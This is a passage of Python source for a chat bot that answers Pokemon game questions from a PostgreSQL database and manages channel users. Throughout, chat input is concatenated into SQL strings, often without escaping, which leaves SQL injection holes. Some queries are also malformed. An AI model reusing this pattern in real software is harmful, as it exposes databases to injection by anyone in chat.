for parameter in parameters:
parameter = parameter.replace("'","''")
parameterid = performSQL("INSERT INTO bot.channelcommandrequestparameter (channelcommandrequestid,channelcommandrequestparameter) VALUES ("+str(channelcommandrequestid)+",'"+parameter+"') RETURNING channelcommandrequestparameterid;")
return channelcommandrequestid
def addOperants(parameters, channel):
note = " User(s) "
exists = False
for parameter in parameters:
parameter = parameter.lower()
operantid = performSQL("SELECT operantid FROM bot.operant WHERE operantname = '"+parameter+"'")
if operantid == []:
operantid = performSQL("INSERT INTO bot.operant (operantname) values ('"+parameter+"') RETURNING operantid;")[0][0]
else:
operantid = operantid[0][0]
operantid = str(operantid)
channeloperantid = performSQL("SELECT channeloperantid FROM bot.channeloperant co LEFT JOIN bot.channel ch ON co.channelid = ch.channelid LEFT JOIN bot.operant op ON co.operantid = op.operantid WHERE ch.channelname = '"+channel+"' AND co.operantid ="+operantid)
if channeloperantid == []:
sql = "INSERT INTO bot.channeloperant (channelid,operantid,operanttypeid) VALUES ((SELECT channelid FROM bot.channel WHERE channelname ='"+channel+"'),"+operantid+",2) RETURNING channeloperantid;"
channeloperantid = performSQL(sql)
else:
exists = True
if parameters.index(parameter) < len(parameters)-3:
note += parameter + ", "
elif parameters.index(parameter) < len(parameters)-2:
note += parameter + " and "
elif parameters.index(parameter) < len(parameters)-1:
note += parameter + " "
message = "Successfully added bot users to configuration."
if exists:
message += note + " already exist(s) as bot user(s) in channel "+channel+"."
return message
def removeOperants(parameters, channel):
message = "User(s) "
for parameter in parameters:
parameter = parameter.lower()
if parameter != channel:
sql = """DELETE FROM bot.channeloperant
WHERE channeloperantid =
(SELECT channeloperantid
FROM bot.channeloperant co
INNER JOIN bot.channel ch ON co.channelid = ch.channelid
INNER JOIN bot.operant op ON co.operantid = op.operantid
WHERE ch.channelname = '"""+channel+"' AND op.operantname = '"+parameter+"""')
RETURNING operantid;"""
operantid = performSQL(sql)
message += parameter
else:
message = "You cannot remove the channel owner from the operant list. "+message
message += " were removed from the channel's user list."
return message
def listOperants(channel):
message = "Users who have permissions in channel "+channel+": "
operants = getOperants(channel)
for operant in operants:
if operants.index(operant) < len(operants)-1:
message += operant+", "
else:
message += operant
return message
def addClient(conn, token, botName, username, server):
channelid = performSQL("SELECT channelid FROM bot.channel WHERE channelname = '"+username+"'")
operantid = performSQL("SELECT operantid FROM bot.operant WHERE operantname = '"+username+"'")
if channelid == []:
sql = "INSERT INTO bot.channel (channelname,gameid) VALUES ('"+username+"',10) RETURNING channelid;"
channelid = performSQL(sql)
if operantid == []:
sql = "INSERT INTO bot.operant (operantname) VALUES ('"+username+"') RETURNING operantid;"
operantid = performSQL(sql)
sql = """SELECT operanttypeid FROM bot.channeloperant co
LEFT JOIN bot.channel ch ON co.channelid = ch.channelid
LEFT JOIN bot.operant op ON co.operantid = op.operantid
WHERE ch.channelname = '"""+username+"""' AND op.operantname ='"""+username+"'"
channeloperantid = performSQL(sql)
if channeloperantid == []:
sql = "INSERT INTO bot.channeloperant (channelid, operantid, operanttypeid) VALUES ("+str(channelid[0][0])+","+str(operantid[0][0])+",1) RETURNING channeloperantid;"
channeloperantid = performSQL(sql)
message = username+""" - You have been successfully added to the channel list.
Game has been set to FireRed. Use !pokegame in your channel to change the game.
Note that I do store usernames and command usage records in the database for use in feature improvement.
Your username will NEVER be shared with anyone for any reason.
Use !brdybotleave in your channel to remove yourself from my channel list."""
operants = getOperants(username)
commandDict = getCommands()
threading.Thread(target=ircListen, args=(conn, token, botName, username, server, operants,commandDict)).start()
elif channeloperantid[0][0] == 1:
message = username+" - I should be operating in your channel. If I'm not, message brdy on Discord to correct the error."
return message
def removeClient(channel):
sql = "INSERT INTO bot.channeldeletion (channelid) values (SELECT ch.channelid FROM bot.channel ch WHERE ch.channelname = '"+channel+"') RETURNING channelid"
channelid = performSQL(sql)
message = channel+" - Successfully removed you from the channel list."
return message
def getMoveID(moveName):
moveID = performSQL(""" WITH ldist as (SELECT mv.moveid,LEAST(pokemon.levenshtein(mv.movename, '"""+moveName+"""'),
pokemon.levenshtein(mn.movenickname, '"""+moveName+"""')) AS distance FROM pokemon.move mv
LEFT JOIN pokemon.movenickname mn ON mv.moveid = mn.moveid)
SELECT moveid,distance FROM ldist WHERE distance < 5 ORDER BY distance LIMIT 1""")
moveID = str(moveID[0][0])
return moveID
def combineParameters(parameters):
name = ""
for parameter in parameters:
name += parameter + " "
name = name[:len(name)-1].title()
return name
def getMonID(monName,channel):
monName = monName.replace("'","''")
monID = performSQL("""WITH ldist as (SELECT DISTINCT mon.pokemonid,LEAST(pokemon.levenshtein(mon.pokemonname,'"""+monName+"""'),
pokemon.levenshtein(pn.pokemonnickname,'"""+monName+"""')) AS distance FROM pokemon.pokemon mon
LEFT JOIN pokemon.pokemonnickname pn ON mon.pokemonid = pn.pokemonid)
SELECT pokemonid,distance FROM ldist WHERE distance < 5 ORDER BY distance LIMIT 1""")
if monID == []:
errorString = "Could not find Pokemon "+monName+"."
return None,errorString
monID = str(monID[0][0])
monName = performSQL("""SELECT DISTINCT mon.pokemonname FROM pokemon.pokemon mon
WHERE mon.pokemonid = """+monID)
monName = str(monName[0][0])
return monID,monName
def getMonInfo(parameters,channel):
if len(parameters) < 1:
monInfo = "The !mon command requires the name of a pokemon as a parameter. (ex: '!mon charizard')"
return monInfo
monName = combineParameters(parameters)
monID,monName = getMonID(monName,channel)
game = getGame(channel)
if monID == None:
return monName
availability = performSQL("""SELECT DISTINCT pa.pokemonavailabilitytypeid
FROM pokemon.pokemongameavailability pa
LEFT JOIN pokemon.game ga ON pa.gameid = ga.gameid
LEFT JOIN pokemon.gamegroup gg ON gg.gamegroupid = ga.gamegroupid
WHERE pa.pokemonid = """+monID+" AND gg.gamegroupabbreviation = '"+game+"'")
if availability[0][0] == 18:
message = monName + " is not available in " + game + "."
return message
#this section gets all the info to be compiled in a string at the end of this function
monName,monDex,monGrowth,monCaptureRate = performSQL("""SELECT DISTINCT mon.pokemonname,mon.pokemonpokedexnumber,
lr.levelingratename,mon.pokemoncapturerate
FROM pokemon.pokemon mon
LEFT JOIN pokemon.levelingrate lr ON mon.levelingrateid = lr.levelingrateid
WHERE pokemonid = """+monID)[0]
monDex = str(monDex)
monCaptureRate = getCaptureRate(monCaptureRate, channel)
monTypes = getMonTypes(monID, channel)
monBST = getMonBST(monID, channel)
monXPYield = getXPYield(monID, channel,5,5)
monEvos = getMonEvos(monID, channel)
monMoves = getMonMoves(monID, channel)
#compiling all of the bits of info into one long string for return
monInfo = "#" + monDex +" " + monName + " ("+game+") " + monTypes + " | Catch: "+monCaptureRate+"% | BST: " + monBST + " | L5 XP: " + monXPYield + " | " + monGrowth + " | " + monEvos + " | " + monMoves
return monInfo
def getMonGrowth(monID,channel):
sql = "SELECT lr.levelingratename FROM pokemon.levelingrate lr LEFT JOIN pokemon.pokemon mon ON lr.levelingrateid = mon.levelingrateid WHERE mon.pokemonid = "+monID
rate = str(performSQL(sql)[0][0])
return rate
def getGeneration(channel):
generation = performSQL("""SELECT gen.generationid FROM bot.channel ch
LEFT JOIN pokemon.game gm ON ch.gameid = gm.gameid
LEFT JOIN pokemon.gamegroup gg ON gm.gamegroupid = gg.gamegroupid
LEFT JOIN pokemon.generation gen ON gg.generationid = gen.generationid
WHERE ch.channelname = '"""+channel+"'")[0][0]
generation = str(generation)
return generation
def getMonDex(monID, channel):
sql = """SELECT DISTINCT mon.pokemonpokedexnumber FROM pokemon.pokemon mon"""
sql += " WHERE mon.pokemonid = "+monID
dexArray = performSQL(sql)
monDex = str(dexArray[0][0])
return monDex
def getMonTypes(monID, channel):
gen = getGeneration(channel)
monTypes = """WITH monTypes as (SELECT pokemonid,type1id,type2id
FROM pokemon.crosstab('select pokemonid, typeid as type1id, typeid as type2id
FROM pokemon.pokemontype pt WHERE pt.generationid = """+gen+"""
AND pt.pokemonid = """+monID+"""
GROUP BY pokemonid,type1id,type2id ORDER BY pokemonid,type1id,type2id')
AS ct( pokemonid int, type1id int, type2id int)) \r\n"""
mainSelect = """SELECT type1.typename,type2.typename FROM monTypes
LEFT JOIN pokemon.type type1 ON monTypes.type1id = type1.typeid
LEFT JOIN pokemon.type type2 ON monTypes.type2id = type2.typeid"""
typeArray = performSQL(monTypes+mainSelect)
#if there are two types, store as (Type1/Type2)
#print(str(typeArray))
types = "("+str(typeArray[0][0])
if typeArray[0][1] != None:
types += "/"+str(typeArray[0][1])+")"
#otherwise, store as (Type)
else:
types += ")"
return types
def getMonBST(monID, channel):
gen = getGeneration(channel)
sql = """SELECT SUM(ps.pokemonstatvalue) bst, ps.generationid gen
FROM pokemon.pokemonstat ps """
sql += "LEFT JOIN pokemon.pokemon mon ON ps.pokemonid = mon.pokemonid WHERE mon.pokemonid ="+monID
sql += " AND ps.generationid <= "+gen+" GROUP BY gen ORDER BY gen DESC LIMIT 1"
bstArray = performSQL(sql)
monBST = str(bstArray[0][0])
return monBST
def getCaptureRate(captureRate,channel):
#this formula approximates the catch rate to within about .1% and will work for future catch rates not currently being used
captureRate = 0.0000000000566758779982193 * math.pow(captureRate,5) - 0.0000000427601042779669*math.pow(captureRate,4) + 0.0000125235963016363*math.pow(captureRate,3) - 0.00191121035271638*math.pow(captureRate,2) + 0.311407303213974*captureRate + 0.846589688792571
captureRate = round(captureRate, 1)
captureRate = str(captureRate)
return captureRate
def getXPYield(monID, channel,enemylevel,monlevel):
gen = getGeneration(channel)
sql = "SELECT DISTINCT xp.experienceyieldvalue,xp.generationid gen FROM pokemon.pokemonexperienceyield xp "
sql += "WHERE xp.pokemonid = "+monID+" "
sql += "AND xp.generationid <= "+gen+" ORDER BY gen DESC LIMIT 1"
xpYieldArray = performSQL(sql)
if xpYieldArray == []:
xp="unknown"
else:
gen = int(gen)
monyield = xpYieldArray[0][0]
xp = monyield*enemylevel/7
xp=str(int(round(xp,0)))
return xp
def getMonEvos(monID, channel):
gen = getGeneration(channel)
sql = "SELECT DISTINCT mon.pokemonname"
sql += """, pel.pokemonevolutionlevel,
i.itemname, l.locationname, pet.evolutiontypeid, pes.pokemonevolutionuniquestring, m.movename, gg.generationid
FROM pokemon.pokemonevolution pe """
sql += """LEFT JOIN pokemon.pokemon mon ON pe.targetpokemonid = mon.pokemonid """
sql +="""LEFT JOIN pokemon.pokemonevolutionlevel pel ON pe.pokemonevolutionid = pel.pokemonevolutionid
LEFT JOIN pokemon.pokemonevolutionmove pem ON pe.pokemonevolutionid = pem.pokemonevolutionid
LEFT JOIN pokemon.move m ON pem.moveid = m.moveid
LEFT JOIN pokemon.pokemonevolutionitem pei ON pe.pokemonevolutionid = pei.pokemonevolutionid
LEFT JOIN pokemon.item i ON pei.itemid = i.itemid
LEFT JOIN pokemon.pokemonevolutionlocation ploc ON pe.pokemonevolutionid = ploc.pokemonevolutionid
LEFT JOIN pokemon.location l ON ploc.locationid = l.locationid
LEFT JOIN pokemon.pokemonevolutiontype pet ON pe.pokemonevolutionid = pet.pokemonevolutionid
LEFT JOIN pokemon.gamegroup gg ON pe.gamegroupid = gg.gamegroupid
LEFT JOIN pokemon.pokemonevolutionstring pes ON pe.pokemonevolutionid = pes.pokemonevolutionid"""
sql += " WHERE pe.basepokemonid = "+monID+" "
sql += """ AND gg.generationid = (SELECT MAX(gg.generationid) FROM pokemon.pokemonevolution pe
LEFT JOIN pokemon.gamegroup gg ON pe.gamegroupid = gg.gamegroupid
WHERE gg.generationid <="""+gen+""" AND pe.basepokemonid = """+monID+""")
ORDER BY generationid DESC"""
evoArray = performSQL(sql)
if evoArray == []:
evoInfo = "Does not evolve"
else:
evoMon = str(evoArray[0][0])
evoLevel = str(evoArray[0][1])
evoItem = str(evoArray[0][2])
evoLocation = str(evoArray[0][3])
evoType = evoArray[0][4]
evoUnique = str(evoArray[0][5])
evoMove = str(evoArray[0][6])
evoInfo = "Evolves into " + evoMon
if evoType == 2 or evoType == 11:
evoInfo += " via trade"
elif evoType == 3:
evoInfo += " via high friendship"
elif evoType == 12:
evoInfo += " as a female"
elif evoType == 13:
evoInfo += " as a male"
elif evoType == 16:
evoInfo += " during the day"
elif evoType == 17:
evoInfo += " at night"
elif evoType == 20:
evoInfo += " in the rain"
elif evoType == 21:
evoInfo += " via high beauty"
if not evoLevel == 'None':
evoInfo += " at level "+evoLevel
if not evoItem == 'None':
if evoType == 4:
evoInfo += " after being exposed to " + evoItem
else:
evoInfo += " while holding " + evoItem
if not evoLocation == 'None':
evoInfo += " at " + evoLocation
if not evoMove == 'None':
evoInfo += " while knowing " + evoMove
if not evoUnique == 'None':
evoInfo += " " + evoUnique
return evoInfo
def getMonMoves(monID, channel):
game = getGame(channel)
sql = """SELECT DISTINCT mv.movename,pm.pokemonmovelevel FROM pokemon.pokemonmove pm
LEFT JOIN pokemon.move mv ON pm.moveid = mv.moveid
LEFT JOIN pokemon.generationmove gm ON mv.moveid = gm.moveid
LEFT JOIN pokemon.gamegroup gg ON pm.gamegroupid = gg.gamegroupid """
sql += "WHERE pm.pokemonid ="+monID
sql+=" AND pokemonmovelevel > 1 AND gg.gamegroupabbreviation ='"+game+"' ORDER BY pm.pokemonmovelevel ASC"
movesArray = performSQL(sql)
if movesArray == []:
moveList = "Does not learn moves"
else:
moveList = "Learns moves at "
for move in movesArray:
moveList += str(move[1])+", "
#remove the extra comma and space after
moveList = moveList[0:len(moveList)-2]
return moveList
def getMoveInfo(parameters, channel):
if len(parameters) < 1:
info = 'The !move command requires the name of a move as a parameter.'
else:
moveName = combineParameters(parameters)
moveName = moveName.replace("'","''")
gen = getGeneration(channel)
moveID = getMoveID(moveName)
if moveID == []:
info = 'I could not find a move called "' +moveName+'.'
else:
moveList = performSQL("""SELECT m.movename, t.typename, mc.movecategoryname, gm.movecontactflag,
gm.movepp, gm.movepower, gm.moveaccuracy, gm.movepriority, gm.movedescription, gm.generationid
FROM pokemon.generationmove as gm
LEFT JOIN pokemon.move as m ON gm.moveid = m.moveid
LEFT JOIN pokemon.type AS t ON gm.typeid = t.typeid
LEFT JOIN pokemon.movecategory AS mc ON gm.movecategoryid = mc.movecategoryid
WHERE gm.moveid = '""" + moveID + "' AND gm.generationid = " + gen)
if moveList == []:
info = 'I could not find a move called "' +moveName+'" in generation '+gen+'.'
else:
moveList=moveList[0]
if 'True' in str(moveList[3]):
moveContact = "C"
else:
moveContact = "NC"
info = str(moveList[0])+" - Gen " +gen+ ": ("+str(moveList[1])+", "+str(moveList[2])+", "+moveContact+") | PP: "+str(moveList[4])+" | Power: "+str(moveList[5])+" | Acc.: "+str(moveList[6])+" | Priority: "+str(moveList[7])+" | Summary: "+str(moveList[8])
return info
def getAbilityInfo(parameters, channel):
if len(parameters) < 1:
abilityInfo = "The !ability command requires the name of an ability as a parameter."
else:
abilityName = combineParameters(parameters)
abilityName = abilityName.replace("'","''")
gen = getGeneration(channel)
abilityName = abilityName.title()
abilityTuple = performSQL(""" WITH ldist as (SELECT ab.abilityname,ga.abilitydescription,ga.generationid,pokemon.levenshtein(ab.abilityname, '"""+abilityName+"""') AS distance FROM pokemon.generationability ga
LEFT JOIN pokemon.ability ab ON ga.abilityid = ab.abilityid
WHERE ga.generationid <= """+gen+""" )
SELECT * FROM ldist
WHERE distance < 4
ORDER BY distance ASC LIMIT 1""")
if not abilityTuple == []:
abilityName = str(abilityTuple[0][0])
abilitySum = str(abilityTuple[0][1])
print(abilitySum)
abilityInfo = abilityName + " (Gen "+gen+"): " + abilitySum
else:
abilityInfo = "Could not find info for ability '"+abilityName+"' in generation " + gen + "."
return abilityInfo
def getNatureInfo(parameters,channel):
if len(parameters) < 1:
natureInfo = "The !nature command requires the name of a nature as a parameter. (ex: !nature adamant)"
else:
natureName = combineParameters(parameters)
natureList = performSQL("""WITH ldist as (SELECT raisedstat.statname raisedstat,loweredstat.statname loweredstat,
n.neutralnatureflag neutral,
pokemon.levenshtein(n.naturename, '"""+natureName+"""') AS distance FROM pokemon.nature n
LEFT JOIN pokemon.stat raisedstat ON n.raisedstatid = raisedstat.statid
LEFT JOIN pokemon.stat loweredstat ON n.loweredstatid = loweredstat.statid)
SELECT * FROM ldist WHERE distance < 5
ORDER BY distance LIMIT 1""")
if natureList == []:
natureInfo = "Could not find info for "+natureName+"."
else:
raisedStat,loweredStat,neutral,distance = natureList[0]
if 'True' in str(neutral):
natureInfo = natureName + " is a neutral nature."
elif 'False' in str(neutral):
natureInfo = "+"+str(raisedStat)+"/"+"-"+str(loweredStat)
else:
natureInfo = "Could not find info for "+natureName+"."
return natureInfo
def getWeaknessInfo(parameters, channel):
if len(parameters) < 1:
weaknessInfo = "The !weak command requires the name of a Pokemon as a parameter. (ex: !weak kartana)"
else:
monName = combineParameters(parameters)
monID,monName = getMonID(monName,channel)
if monID == None:
return monName
gen = getGeneration(channel)
monTypes = """WITH montypes AS( SELECT pokemonid,type1id,type2id
FROM pokemon.crosstab('select pokemonid, typeid as type1id, typeid as type2id
FROM pokemon.pokemontype WHERE generationid = (SELECT MAX(generationid) FROM pokemon.pokemontype WHERE pokemonid = """+monID+""" AND generationid <= """+gen+""") AND pokemonid = """+monID+"""
GROUP BY pokemonid,type1id,type2id ORDER BY pokemonid,type1id,type2id')
AS ct( pokemonid int, type1id int, type2id int)), \r\n"""
damage1 = """damage1 as (
SELECT DISTINCT attacktype.typename attacker,SUM(coalesce(tm.damagemodifier::float,1)) as damage
FROM montypes
LEFT JOIN pokemon.typematchup tm ON montypes.type1id = tm.defendingtypeid
LEFT JOIN pokemon.type attacktype ON tm.attackingtypeid = attacktype.typeid
WHERE tm.generationid = """+gen+"""
GROUP BY attacktype.typename),\r\n"""
damage2 = """damage2 as (
SELECT DISTINCT attacktype.typename attacker,SUM(coalesce(tm.damagemodifier::float,1)) as damage
FROM montypes
LEFT JOIN pokemon.typematchup tm ON montypes.type2id = tm.defendingtypeid
LEFT JOIN pokemon.type attacktype ON tm.attackingtypeid = attacktype.typeid
WHERE tm.generationid = """+gen+"""
GROUP BY attacktype.typename) \r\n"""
mainSelect = """SELECT damage1.attacker attacktype,SUM(coalesce(damage1.damage,1) * coalesce(damage2.damage,1)) as totaldamage
FROM damage1 LEFT JOIN damage2 ON damage1.attacker = damage2.attacker
GROUP BY attacktype"""
matchupInfo = performSQL(monTypes+damage1+damage2+mainSelect)
printableDict = {4.0:[],2.0:[],1.0:[],.5:[],.25:[],0:[]}
for type,dmgmodifier in matchupInfo:
printableDict[dmgmodifier].append(type)
monTypes = getMonTypes(monID, channel)
weaknessInfo = monName +" "+ monTypes + ", Gen " +gen+" = \r"
if printableDict[4.0]:
weaknessInfo += "(4x): " + str(printableDict[4.0])+ " // "
if printableDict[2.0]:
weaknessInfo += "(2x): " + str(printableDict[2.0]) + " // "
if printableDict[1.0]:
weaknessInfo += "(1x): " + str(printableDict[1.0]) + " // "
if printableDict[0.5]:
weaknessInfo += "(.5x): " + str(printableDict[0.5]) + " // "
if printableDict[0.25]:
weaknessInfo += "(.25x): " + str(printableDict[0.25]) + " // "
if printableDict[0]:
weaknessInfo += "0x: " + str(printableDict[0])
weaknessInfo = weaknessInfo.replace('[','').replace(']','').replace("\'","")
return weaknessInfo
def getAbbrevs():
abbrevs = performSQL("SELECT DISTINCT gg.gamegroupabbreviation,gg.gamegrouporder FROM pokemon.gamegroup gg INNER JOIN pokemon.game gm ON gg.gamegroupid = gm.gamegroupid ORDER BY gg.gamegrouporder")
message = "Available games are: "
for abbrev in abbrevs:
message += abbrev[0]+", "
message = message[:len(message)-2]
return message
def getGames():
games = performSQL("SELECT gm.gamename,gg.gamegrouporder FROM pokemon.game gm LEFT JOIN pokemon.gamegroup gg ON gm.gamegroupid = gg.gamegroupid ORDER BY gg.gamegrouporder,gm.gamename")
message = "Available games are: "
for game in games:
message += game[0]+", "
message = message[:len(message)-2]
return message
def dbConfig(configFile = "chatbot.ini",section="database"):
config = configparser.ConfigParser()
config.read(configFile)
db = {}
configuration = config.items(section)
for option in configuration:
db[option[0]] = option[1]
return db
def chatMessage(messageString, channel, server):
server.send(bytes('PRIVMSG #'+ channel + ' :'+messageString+' \r\n', 'utf-8'))
def performSQL(sql):
dbConn = dbConfig()
#print("Connecting to database...")
conn = psycopg2.connect(**dbConn)
with conn.cursor() as cur:
conn.set_session(readonly=False, autocommit=True)
#print("Executing... " +sql)
cur.execute(sql)
result = cur.fetchall()
return result
def setGame(game, channel, server):
#create an error message if there are no parameters given
if len(game) < 1:
message = "Command !pokegame requires a game name or abbreviation as a parameter. Use !gamelist to see a list."
#if there are parameters, try using it as a game name and fetching an abbreviation
else:
#turn the parameters into a gamename string
gameName = ""
for word in game:
gameName += word
#try using the parameters as an exact match with a game abbreviation
gameName = gameName.upper()
selectedGame = performSQL("""SELECT gg.gamegroupname, gg.gamegroupabbreviation,'null',gm.gamename,gm.gameid
FROM pokemon.gamegroup gg
LEFT JOIN pokemon.game gm ON gg.gamegroupid = gm.gamegroupid
WHERE gg.gamegroupabbreviation = '"""+gameName+"' LIMIT 1")
#if we fail to find a game, try using the parameters as a full game name with levenshtein distance < 5
if selectedGame == []:
gameName = gameName.title()
selectedGame= performSQL("""WITH ldist as (SELECT gg.gamegroupname, gg.gamegroupabbreviation,pokemon.levenshtein(gm.gamename, '"""+gameName+"""')
AS distance,gm.gamename,gm.gameid FROM pokemon.game gm
LEFT JOIN pokemon.gamegroup gg ON gm.gamegroupid = gg.gamegroupid)
SELECT * FROM ldist WHERE distance < 4
ORDER BY distance LIMIT 1""")
#if we found a game in either query above, find the generation, update the config, and say there was a success!
if not selectedGame == []:
groupName,gameAbbrev,throwAwayVariable,gameName,gameid = selectedGame[0]
updateGame = "UPDATE bot.channel set gameid = "+str(gameid)+" WHERE channelname = '"+channel+"' RETURNING channelid;"
channelid = performSQL(updateGame)
message = "Changed the game to "+gameName+"."
else:
message = gameName+" is not a valid game. Use !abbrevs for a list of valid abbreviations/games. I wasn't able to change the game to "+gameName+"."
return message
def getCoverage(coverageTypes,channel):
gen = getGeneration(channel)
game = getGame(channel)
gameID = str(getGameID(channel))
typeIDs = []
typeNames = []
for coverageType in coverageTypes:
type = performSQL("""WITH ldist AS (SELECT ty.typeid,ty.typename,pokemon.levenshtein(ty.typename,'"""+coverageType+"""')
AS distance FROM pokemon.type ty where ty.generationid <="""+gen+""")
SELECT * FROM ldist WHERE distance < 3 ORDER BY distance LIMIT 1""")
if type == []:
message = coverageType.title()+" is not a valid type in generation "+gen+"."
return message
else:
typeIDs.append(type[0][0])
typeNames.append(type[0][1])
monTypes = """WITH montypes as (
SELECT pokemonid,type1id,type2id
FROM pokemon.crosstab('select pt.pokemonid, typeid as type1id, typeid as type2id
FROM pokemon.pokemontype pt
LEFT JOIN pokemon.pokemongameavailability pga ON pt.pokemonid = pga.pokemonid
LEFT JOIN pokemon.game gm ON pga.gameid = gm.gameid
WHERE pt.generationid ="""+gen+"""
AND gm.gameid = """+gameID+"""
AND pga.pokemonavailabilitytypeid != 18
GROUP BY pt.pokemonid,type1id,type2id ORDER BY pt.pokemonid,type1id,type2id')
AS ct( pokemonid int, type1id int, type2id int)),"""
damage1 = """damage1 AS (\r\n"""
damage1 += """SELECT montypes.pokemonid,mon.pokemonname,"""
for typeName in typeNames:
damage1 += """CASE WHEN (montypes.pokemonid = 343 AND """+typeName+"""1.attackingtypeid NOT IN(2,10,13,14,16)) THEN 0 ELSE """
damage1 += typeName+"1.damagemodifier::float END as "+typeName+"damage"
if typeNames.index(typeName) < len(typeNames)-1:
damage1 += ","
elif typeNames.index(typeName) == len(typeNames)-1:
damage1 += "\r\n"
damage1 += """ FROM montypes\r\n
LEFT JOIN pokemon.pokemon mon ON montypes.pokemonid = mon.pokemonid \r\n"""
for typeName in typeNames:
damage1 += "LEFT JOIN pokemon.typematchup "+typeName+"1 ON montypes.type1id = "+typeName+"1.defendingtypeid\r\n"
damage1 += " WHERE "
for typeName in typeNames:
damage1 += typeName+"1.attackingtypeid = "+str(typeIDs[typeNames.index(typeName)])+"\r\n AND "
damage1 += typeName+"1.generationid = "+gen+" "
if typeNames.index(typeName) < len(typeNames)-1:
damage1 += "\r\n AND "
damage1 += "\r\nGROUP BY montypes.pokemonid,mon.pokemonname,"
for typeName in typeNames:
damage1 += typeName+"damage"
if typeNames.index(typeName) < len(typeNames)-1:
damage1 += ","
elif typeNames.index(typeName) == len(typeNames)-1:
damage1 += "),\r\n "
damage2 = "damage2 as (SELECT montypes.pokemonid,mon.pokemonname,"""
for typeName in typeNames:
damage2 += """CASE WHEN (montypes.pokemonid = 343 AND """+typeName+"""2.attackingtypeid NOT IN(2,10,13,14,16)) THEN 0 ELSE """
damage2 += typeName+"2.damagemodifier::float END as "+typeName+"damage"
if typeNames.index(typeName) < len(typeNames)-1:
damage2 += ","
damage2 += """\r\n FROM montypes\r\n
LEFT JOIN pokemon.pokemon mon ON montypes.pokemonid = mon.pokemonid \r\n"""
for typeName in typeNames:
damage2 += "LEFT JOIN pokemon.typematchup "+typeName+"2 ON montypes.type2id = "+typeName+"2.defendingtypeid\r\n"
damage2 += " WHERE "
for typeName in typeNames:
damage2 += typeName+"2.attackingtypeid = "+str(typeIDs[typeNames.index(typeName)])+"\r\n AND "
damage2 += typeName+"2.generationid = "+gen+" "
if typeNames.index(typeName) < len(typeNames)-1:
damage2 += "\r\n AND "
damage2 += "\r\n GROUP BY montypes.pokemonid,mon.pokemonname,"
for typeName in typeNames:
damage2 += typeName+"damage"
if typeNames.index(typeName) < len(typeNames)-1:
damage2 += ","
elif typeNames.index(typeName) == len(typeNames)-1:
damage2 += ") "
preSelect = "SELECT damage, count(*) FROM (\r\n"
mainSelect = "SELECT damage1.pokemonid, GREATEST("
for typeName in typeNames:
mainSelect += "SUM(coalesce(damage1."+typeName+"damage,1) * coalesce(damage2."+typeName+"damage,1))"
if typeNames.index(typeName) < len(typeNames)-1:
mainSelect += ",\r\n "
elif typeNames.index(typeName) == len(typeNames)-1:
mainSelect += ") as damage FROM damage1 LEFT JOIN damage2 ON damage1.pokemonid = damage2.pokemonid "
mainGroup = "GROUP BY damage1.pokemonid "
postSelect = ") AS mondamage GROUP BY damage ORDER BY damage ASC\r\n"
selectString = monTypes+damage1+damage2+preSelect+mainSelect+mainGroup+postSelect
pokemonList = performSQL(selectString)
coverageString = "Types: "
for name in typeNames:
coverageString += name
if typeNames.index(name) < len(typeNames)-1:
coverageString += ", "
coverageString += " - "
pokemonString = "-- Obstacles: "
coverageString += " ("+game+"): "
for array in pokemonList:
coverageString += str(array[0]).replace(".0",".").replace("0.5",".5").replace("0.","0").replace("1.","1").replace("2.","2").replace("4.","4")+"x: "+str(array[1])
if pokemonList.index(array) < len(pokemonList)-1:
coverageString += " // "
if pokemonList[0][0] < .5 and pokemonList[1][0] < .5:
pokemonString = " -- Obstacles < 1x"
limit = pokemonList[0][1]+pokemonList[1][1]
elif pokemonList[0][0] < 1 and pokemonList[1][0] < 1:
pokemonString = " -- Obstacles < 1x"
limit = pokemonList[0][1]+pokemonList[1][1]
elif pokemonList [0][0] < 1 and pokemonList [1][0] == 1:
pokemonString = " -- Obstacles"
limit = pokemonList[0][1]
elif pokemonList[0][0] == 1:
pokemonString = " -- Top 5 1x Threats"
limit = 5
if int(limit) > 12:
pokemonString += " (Limit 12): "
limit = 12
else:
pokemonString += ": "
bstSelect = "SELECT damage1.pokemonid, mon.pokemonname, GREATEST("
for typeName in typeNames:
bstSelect += "SUM(coalesce(damage1."+typeName+"damage,1) * coalesce(damage2."+typeName+"damage,1))"
if typeNames.index(typeName) < len(typeNames)-1:
bstSelect += ",\r\n "
elif typeNames.index(typeName) == len(typeNames)-1:
bstSelect += """) as damage\r\n
FROM damage1\r\n
LEFT JOIN damage2 ON damage1.pokemonid = damage2.pokemonid\r\n
LEFT JOIN pokemon.pokemon mon ON damage1.pokemonid = mon.pokemonid\r\n"""
monBST = """, monBST as (\r\n
SELECT mon.pokemonid monid,\r\n
mon.pokemonname as monname,\r\n
ps.generationid gen,\r\n
sum(ps.pokemonstatvalue) as bst\r\n
FROM pokemon.pokemonstat ps\r\n
LEFT JOIN pokemon.pokemon mon ON ps.pokemonid = mon.pokemonid\r\n
WHERE ps.generationid <= """+gen+"""GROUP BY monid,monname,gen ORDER BY gen DESC, monid, monname) \r\n"""
preWith = "WITH monDamageQuery as (\r\n"
postWith = ")"
bstGroup = " GROUP BY damage1.pokemonid,mon.pokemonname \r\n"
bstOrder = " ORDER BY damage ASC\r\n"""
realSelect = """SELECT damage, bst, monDamageQuery.pokemonname, monBST.gen FROM monDamageQuery
LEFT JOIN monBST ON monDamageQuery.pokemonid = monBST.monid
GROUP BY damage, bst, monDamageQuery.pokemonname, monBST.gen
ORDER BY damage ASC, bst DESC, monDamageQuery.pokemonname, monBST.gen"""
coverageQuery = monTypes+damage1+damage2+bstSelect+bstGroup+bstOrder
sql = preWith+coverageQuery+postWith+monBST+realSelect
pokemonBSTList = []
pokemonIDs = performSQL(sql)
if len(pokemonIDs) == 0:
pokemonString += "None"
for obstacle in pokemonIDs:
if len(pokemonBSTList) < int(limit):
obstacleName = obstacle[2]
if not obstacleName in pokemonBSTList:
pokemonBSTList.append(obstacleName)
pokemonString += obstacleName+", "
pokemonString = pokemonString[0:len(pokemonString)-2]
coverageString += pokemonString
coverageString = coverageString.replace(" Form)",")")
return coverageString
def getGameID(channel):
gameID = performSQL("""SELECT gameid FROM bot.channel WHERE channelname = '"""+channel+"'")[0][0]
return gameID
def getGame(channel):
game = performSQL("""SELECT gg.gamegroupabbreviation FROM bot.channel ch
LEFT JOIN pokemon.game gm ON ch.gameid = gm.gameid
LEFT JOIN pokemon.gamegroup gg ON gm.gamegroupid = gg.gamegroupid
WHERE ch.channelname = '"""+channel+"'")[0][0]
return game
if __name__ == "__main__":
main()
|
test_framed_transport.py
|
